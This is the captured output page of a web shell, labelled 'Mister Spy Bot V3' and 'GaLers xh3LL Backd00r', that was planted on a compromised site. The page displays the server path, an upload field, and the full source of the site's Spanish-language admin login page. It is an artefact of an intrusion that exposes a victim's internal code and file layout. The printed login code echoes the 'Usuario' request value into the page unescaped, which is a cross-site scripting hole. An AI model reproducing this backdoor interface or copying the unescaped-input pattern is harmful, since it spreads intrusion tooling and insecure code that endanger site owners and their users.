Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/_adminexpo_/
Upload File :
Current File : /home/caballoscriollos/www/espanol/_adminexpo_/index.php

<?php

require_once('inc_library.php');

/* destruye la sesion y la vuelve a iniciar, */ 
/* para que queden todos los valores null */
Session::Logout();
Session::Initialize();

$Submit = (isset($_REQUEST['Submitted']));

$Usuario = (isset($_GET['Usuario'])) ? $_GET['Usuario'] : "";

if ($Submit)
{
	$User = ((isset($_REQUEST['User']) && ($_REQUEST['User'] != ""))) ? $_REQUEST['User'] : "";
	$Pass = ((isset($_REQUEST['Pass']) && ($_REQUEST['Pass'] != ""))) ? $_REQUEST['Pass'] : "";

	if ((trim($User) != "") && (trim($Pass) != ""))
	{
		$retValue = Session::Login($User, $Pass);
				
		if ($retValue === Session::LoginError)
		{
			Session::ForceLogin($User, 'index.php', $retValue);
			exit();
		}
		else
		{
			if(!headers_sent())
			{
				header("Location: home.php");
				exit();
			}
			else
			{
				exit('<meta http-equiv="refresh" content="0; url=' . urldecode('home.php') . '"/>');
			}
		}
	}
}

?>
<?php Modules::WriteClientFunctions(); ?>
<!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.01 transitional//EN" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<?php include('include/head.inc.php'); ?>
</head>
<body onLoad="javascript:document.frmLogin.User.focus();">

<p>&nbsp;</p>

<form action="" id="frmLogin" name="frmLogin" method="post" target="_top">
	<input type="hidden" name="Submitted" id="Submitted" value="1">

	<table width="100%" border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse;">
		<tr>
			<td>
				<table border="0" cellpadding="0" cellspacing="0" align="center">
					<tr>
						<td><div align="center"><span class="tituloLogin">INGRESO AL ADMINISTRADOR DEL SISTEMA ACCC</span></div></td>
					</tr>
				</table>
			</td>
		</tr>
		<tr>
			<td height="50">&nbsp;</td>
		</tr>
		<tr>
			<td>
				<table width="250" border="0" align="center" cellpadding="5" cellspacing="0" class="bordeGrisLogin">
					<tr>
						<td>
							<table width="100%" border=0 align="center" cellpadding="10" cellspacing="0" style="border-collapse: collapse;">
								<tbody>
									<tr bgcolor="#FFFFFF">
										<td align=middle bgcolor="#FFFFFF">
									  <div align="center">
												<table width="100%"  border="0" cellspacing="0" cellpadding="0">
													<tr>
														<td><div align="center"><img src="images/logo.jpg"></div></td>
													</tr>
													<tr>
														<td height="30">
															<table width="100%"  border="0" cellpadding="0" cellspacing="0" id="linea">
																<tr>
																	<td height="1" background="images/linea_punteada.gif"><div align="center"></div></td>
																</tr>
															</table>														</td>
													</tr>
													<tr>
														<td>
															<table border="0" align="center" cellpadding="3" cellspacing="0" style="border-collapse: collapse;">
																<tbody>
																	<tr valign="middle">
																		<td><div align="left"><strong>Usuario:</strong></div></td>
																	</tr>
																	<tr valign="middle">
																		<td><div align="left"><input type="text" name="User" class="campoLogin" id="User" value="<?=$Usuario?>"></div></td>
																	</tr>
																	<tr valign="middle">
																		<td><div align="left"><StrONG>Contrase&ntilde;a:</StrONG></div></td>
																	</tr>
																	<tr valign="middle">
																		<td><div align="left"><input type="password" name="Pass" class="campoLogin" id="Pass" ></div></td>
																	</tr>
																</tbody>
															</table>														</td>
													</tr>
												</table>
										  </div>
										</td>
								  </tr>
									<tr>
										<td height="2" align=middle><div align="center"></div></td>
									</tr>
								</table>
								<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="bordeGrisLoginFondo">
									<tr valign="middle">
										<td height="30"><div align="right"><input type="submit" class="botonBasico" value="Ingresar"></div></td>
										<td width="28">&nbsp;</td>
								  </tr>
								</table>
							</td>
						</tr>
					<td height="15"></tbody>
				</table>
			</td>
		</tr>
	</table>
</form>

<p>&nbsp;</p>

</body>
</html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat